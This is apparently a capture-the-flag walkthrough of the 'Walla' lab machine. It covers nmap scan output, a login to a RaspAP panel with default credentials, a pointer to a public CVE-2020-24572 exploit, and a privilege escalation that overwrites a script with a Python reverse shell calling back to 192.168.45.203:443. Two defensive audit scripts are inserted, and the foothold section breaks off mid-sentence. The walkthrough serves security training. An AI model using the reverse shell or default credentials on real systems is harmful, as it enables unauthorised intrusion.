
PG-Walla-Wp

Secsheep, 4 October 2023

Contents
  • 1.Reconnaissance
  • 2.Enumeration
  • 3.Foothold
  • 4.Privilege Escalation

1.Reconnaissance

 

sudo ./nmapAutomator.sh 192.168.185.97 all

Running all scans on 192.168.185.97

Host is likely running Unknown OS!

———————Starting Port Scan———————–

 

PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain

 

———————Starting Script Scan———————–

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=walla
| Subject Alternative Name: DNS:walla
| Not valid before: 2020-09-17T18:26:36
|_Not valid after: 2030-09-15T18:26:36
|_smtp-commands: walla, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open tcpwrapped
Service Info: Host: walla; OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

———————Starting Full Scan————————

PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
422/tcp open ariel3
8091/tcp open jamlink
42042/tcp open unknown

 

Making a script scan on extra ports: 422, 8091, 42042

PORT STATE SERVICE VERSION
422/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
8091/tcp open http lighttpd 1.4.53
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=RaspAP
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: lighttpd/1.4.53
42042/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

———————-Starting UDP Scan————————

 

No UDP ports are open

 

———————Starting Vulns Scan———————–

Running CVE scan on all ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
|_ PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open tcpwrapped
422/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
|_ PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
8091/tcp open http lighttpd 1.4.53
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.53:
|_ CVE-2019-11072 7.5 https://vulners.com/cve/CVE-2019-11072
|_http-server-header: lighttpd/1.4.53
42042/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
|_ PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
Service Info: Host: walla; OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

Running Vuln scan on all ports
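The scan above is a plain-text service table with indented NSE script lines underneath each port. The following triage helper is an added example (not part of this writeup and not from nmapAutomator) that parses that shape and turns the facts already visible in the output into defender-side findings: the same sshd on three ports, a cleartext telnet login, SMTP VRFY left on, an HTTP Basic realm that names the product, and a session cookie without HttpOnly. The sample input is constructed to mirror the page's output; the remediation hints (Postfix `disable_vrfy_command`, php.ini `session.cookie_httponly`) are standard settings, not something the page states.

```python
"""Triage helper for nmap service-scan output (added example, not part of the
original writeup or of nmapAutomator). It parses the plain-text service table
plus the indented NSE script lines and emits defender-oriented findings."""
import re
from dataclasses import dataclass, field

# Constructed sample: shaped like the writeup's script-scan output.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: walla, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS
53/tcp open tcpwrapped
422/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8091/tcp open http lighttpd 1.4.53
| http-auth:
| HTTP/1.1 401 Unauthorized\\x0D
|_ Basic realm=RaspAP
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
42042/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
"""

# "<port>/<proto> <state> <service> [version...]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str
    script_lines: list = field(default_factory=list)


def parse_scan(text):
    """Build one Service per port line; NSE lines ('|' / '|_' prefixed)
    are attached to the most recent port."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            services.append(Service(int(m.group(1)), m.group(2), m.group(3),
                                    m.group(4), m.group(5).strip()))
        elif line.startswith("|") and services:
            services[-1].script_lines.append(line.lstrip("|_ ").strip())
    return services


def triage(services):
    """Return human-readable findings for the exposures the scan reveals."""
    findings = []
    ssh_ports = [s.port for s in services if s.name == "ssh"]
    if len(ssh_ports) > 1:
        findings.append(f"sshd exposed on multiple ports {ssh_ports}: confirm each "
                        "instance is intended and uses the hardened sshd_config")
    for s in services:
        if s.name == "telnet":
            findings.append(f"{s.port}/{s.proto}: telnet offers cleartext logins; "
                            "disable it and use ssh")
        if s.name == "smtp" and any("VRFY" in l for l in s.script_lines):
            findings.append(f"{s.port}/{s.proto}: SMTP VRFY enabled, allows account "
                            "enumeration; set disable_vrfy_command = yes in Postfix")
        for l in s.script_lines:
            if l.startswith("Basic realm="):
                realm = l.split("=", 1)[1]
                findings.append(f"{s.port}/{s.proto}: HTTP Basic auth realm '{realm}' "
                                "identifies the product; verify default credentials "
                                "were changed and the panel is not Internet-facing")
            if "httponly flag not set" in l:
                findings.append(f"{s.port}/{s.proto}: session cookie lacks HttpOnly; "
                                "set session.cookie_httponly=1 in php.ini")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_scan(SAMPLE_SCAN)):
        print("-", finding)
```

Feed it a real `nmap -sV -sC -oN` file instead of `SAMPLE_SCAN` to get the same report for your own hosts; the realm finding is the one that matters most here, because a product name in the 401 response is exactly what led to the default credentials in the next section.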

2.Enumeration

When we access port 8091 in the Firefox browser, we are prompted to log in,

and at this point we don't have any creds, so I tried "admin:admin" and "admin:password".

It doesn't work, so I look at the message the pop-up gives us, which is "RaspAP". Instantly my mind starts to think about what this could be, so I google it and find out it's an access point.

Well, I checked the RaspAP official website, and it indicates that the default username and password are "admin:secret".

 

3.Foothold

So, using these creds we can log in to port 8091.

In this case RaspAP version 2.5 is running and there is an exploit for it. I quickly find one on GitHub. PoC:

https://github.com/lb0x/cve-2020-24572. Initially the exploit

4.Privilege Escalation

Then upload linpeas.sh to enumerate privilege escalation vectors.

Then find a vulnerable service.

As www-data we can delete the file /home/walter/wifi_reset.py and replace it with a Python reverse shell of the same name:

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.203",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")' > /home/walter/wifi_reset.py
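The root cause of this escalation is a script that a privileged job executes but that a low-privileged user can delete and recreate. The audit below is an added example (not from this writeup, and it does not reproduce the box's actual job) that checks a list of scheduled-script paths for that condition: owner different from the uid that runs the job, group- or world-writable mode bits, and a parent directory that allows delete-and-replace even when the file itself is read-only. The paths and the assumption that the job runs as root are constructed for the demo.

```python
"""Audit scripts that a privileged job (cron, systemd timer, sudo rule) will
execute, flagging files an unprivileged user can replace. Added example: not
from the writeup; the path list and the assumed runner uid are constructed."""
import os
import stat
import tempfile


def classify(path, owner_uid, mode, dir_uid, dir_mode, runner_uid=0):
    """Return the reasons why `path` is unsafe for a job running as
    runner_uid (root by default). Pure function so it can be exercised
    without changing real file ownership."""
    reasons = []
    if owner_uid != runner_uid:
        reasons.append(f"{path}: owned by uid {owner_uid}, not by the executing "
                       f"uid {runner_uid}; the owner can rewrite the script")
    if mode & stat.S_IWOTH:
        reasons.append(f"{path}: world-writable (mode {oct(mode & 0o777)})")
    elif mode & stat.S_IWGRP:
        reasons.append(f"{path}: group-writable (mode {oct(mode & 0o777)}); "
                       "any group member can rewrite it")
    # A parent directory owned by someone else, or writable by group/others,
    # lets an attacker unlink the file and drop a new one with the same name,
    # which is exactly the delete-and-replace pattern used on this box.
    if dir_uid != runner_uid or dir_mode & (stat.S_IWOTH | stat.S_IWGRP):
        reasons.append(f"{path}: parent directory (uid {dir_uid}, mode "
                       f"{oct(dir_mode & 0o777)}) allows delete-and-replace")
    return reasons


def audit(paths, runner_uid=0):
    """Stat each path and its parent and classify it; a missing script is
    reported too, since a dangling job reference can be filled in later."""
    findings = {}
    for p in paths:
        try:
            st = os.stat(p)
            dst = os.stat(os.path.dirname(p) or ".")
        except FileNotFoundError:
            findings[p] = [f"{p}: missing; the job references a file that "
                           "an attacker could create"]
            continue
        findings[p] = classify(p, st.st_uid, st.st_mode,
                               dst.st_uid, dst.st_mode, runner_uid)
    return findings


def demo():
    """Constructed layout in a temp dir: one world-writable script and one
    0644 script, evaluated as if the current user were the job's runner so
    that only the mode checks fire."""
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o755)
        bad = os.path.join(d, "wifi_reset.py")
        good = os.path.join(d, "safe.py")
        for p in (bad, good):
            with open(p, "w") as fh:
                fh.write("print('hello')\n")
        os.chmod(bad, 0o666)
        os.chmod(good, 0o644)
        return audit([bad, good], runner_uid=os.getuid())


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", reasons or "ok")
```

Point `audit()` at the scripts named in /etc/crontab, /etc/cron.d/*, systemd unit ExecStart lines and sudoers NOPASSWD entries; a clean result is every path owned by the runner, mode 0755 or tighter, and parents owned by root without group/other write.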
